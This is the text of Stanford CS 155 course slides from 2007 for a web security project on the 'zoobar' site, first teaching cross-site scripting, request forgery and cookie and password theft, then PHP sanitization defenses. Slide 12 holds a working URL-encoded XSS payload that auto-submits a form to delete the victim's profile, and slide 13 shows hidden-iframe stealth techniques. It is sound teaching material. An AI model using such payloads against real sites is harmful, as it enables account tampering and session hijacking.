Embed Size (px)
Citation preview
1
Project 2: Web App Security
Collin Jackson
CS 155 Spring 2007
2
Part 1
Attacks
3
Overview
• Explore severalattack types
• Requires botheffectiveness and stealth
• Learn:• How an attacker can evade sanitization• Consequences of an exploit• JavaScript• Very basic CSS
4
A: Cookie Theft Use URL encoding Could hijack
session
C: Password Theft Evade sanitization Handle DOM
events
Attacks
B: Request Forgery Navigate browser Use iframes, forms
D: Profile Worm Persistent attack Replicates
zoobar.orglink
emailzoobar.org
formbadguy.com
stanford.eduredirect
badguy.comzoobar.orgform
zoobar.org
5
Sanitization
Works differently depending on context<tag property=" attackstring "> Attack: Break out with ' " Defense: escape quotes with \
<body> attackstring </body> Attack: Launch script with < > Attack: Close off parent tag </tag> Defense: escape angle brackets
eval( attackstring ) Attack: Do whatever you want Defense: Don’t do that
6
Example: Profile Deleter
Malicious hyperlink deletes profile of user who clicks itOnly works when user logged in User might have multiple tabs open Might have chosen/forgotten not to log
out Might appear in another user’s profile
Uses vulnerability in users.php from Attack AConstructs profile deletion form and submits it
???
7
Find vulnerabilitySite reflectsquery parameter in input field
Link can includeanything wewant here
8
Copy form data
View sourceto find formfields
Create copycat form with ourmodifications
9
Close previous<input>,<form>
Buttonclick triggersform submit
URL encodehttp://scriptasylum.com/tutorials/encdec/encode-decode.html
http://www.dommermuth-1.com/protosite/experiments/encode/index.html
10
Debugging
Check error
It didn’t work.Open JavaScriptconsole
Undefined No properties!
Two formswith same name
11
Now withcorrectform
Fixed version
12
Profile deleted
Final Test
users.phpreplacedwith index.php
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
13
Post form into hidden iframe <form name=F action=/index.php target=myframe>…<iframe name=myframe style=“visibility:hidden”>…
Open page with form in hidden iframe
<iframe name=myframe style=“visibility:hidden”>…<script>document.myframe.contentDocument.forms[0] .profile_update.value =“”;</script>
Stealthier approaches
14
Part 2
Defenses
15
Goals
• Learn:• How easy it is to make mistakes• That even simple code can be hard to secure• Techniques for appropriate input validation• PHP• Very basic SQL
Little programming knowledge can be a dangerous thing
16
File structure
index.php users.phptransfer.phplogin.phpincludes/ auth.php (cookie authentication) common.php (includes everything else) navigation.php (site template)
db/ zoobar/
Person.txt (must be writable by web server)Includes /usr/class/cs155/projects/pp2/txt-db-api/…
Only edit these files
17
txt-db-api
Third-party text file database libraryData can be int, string, and autoincrementNeed to escape strings: \' \" \\Actually magic_quotes_gpc does this for us$recipient = $_POST[‘recipient’]; // already escaped$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql);if( $rs->next() )
$id = $rs->getCurrentValueByName(‘PersonID’);
18
A: Cookie Theft
C: Password Theft
Defenses to Part 1
B: Request Forgery
Attack D: Profile Worm
19
PHP Sanitization Techniques
addslashes(string) Prepends backslash to ' " \ Already done by magic_quotes_gpc Inverse: stripslashes(string)htmlspecialchars(string [, quote_style]) Converts & < > " to HTML entities Use ENT_QUOTES to change ' to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag propertiespreg_replace(pattern, replacement, subject)More info: http://php.net
20
More XSS hunting
Look for untrusted input used as outputNote sanitization already applied to each variable Form data has magic_quotes_gpc, db data does
notSanitize the output if necessary No penalty for erring on the side of caution But sanitizing multiple times may lead to
problemsNo credit for solving non-goals: SQL injection, etc.
21
Good luck!
